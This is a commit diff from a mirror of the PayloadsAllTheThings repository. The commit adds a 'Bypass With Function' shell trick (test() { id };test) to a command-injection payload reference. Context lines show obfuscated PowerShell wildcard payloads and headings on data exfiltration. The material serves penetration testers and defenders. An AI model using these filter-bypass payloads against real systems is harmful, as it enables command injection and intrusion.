mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-06 17:02:53 +01:00
added new filter bypass
This commit is contained in:
parent
f0f71990ac
commit
cd04db0ba3
1 changed files with 7 additions and 0 deletions
|
|
@ -26,6 +26,7 @@
|
||||||
* [Bypass With $()](#bypass-with--1)
|
* [Bypass With $()](#bypass-with--1)
|
||||||
* [Bypass With Variable Expansion](#bypass-with-variable-expansion)
|
* [Bypass With Variable Expansion](#bypass-with-variable-expansion)
|
||||||
* [Bypass With Wildcards](#bypass-with-wildcards)
|
* [Bypass With Wildcards](#bypass-with-wildcards)
|
||||||
|
* [Bypass With Function](#bypass-with-function)
|
||||||
* [Data Exfiltration](#data-exfiltration)
|
* [Data Exfiltration](#data-exfiltration)
|
||||||
* [Time Based Data Exfiltration](#time-based-data-exfiltration)
|
* [Time Based Data Exfiltration](#time-based-data-exfiltration)
|
||||||
* [Dns Based Data Exfiltration](#dns-based-data-exfiltration)
|
* [Dns Based Data Exfiltration](#dns-based-data-exfiltration)
|
||||||
|
|
@ -351,6 +352,12 @@ powershell C:\*\*2\n??e*d.*? # notepad
|
||||||
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
|
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Bypass With Function
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
test() { id };test
|
||||||
|
```
|
||||||
|
|
||||||
## Data Exfiltration
|
## Data Exfiltration
|
||||||
|
|
||||||
### Time Based Data Exfiltration
|
### Time Based Data Exfiltration
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue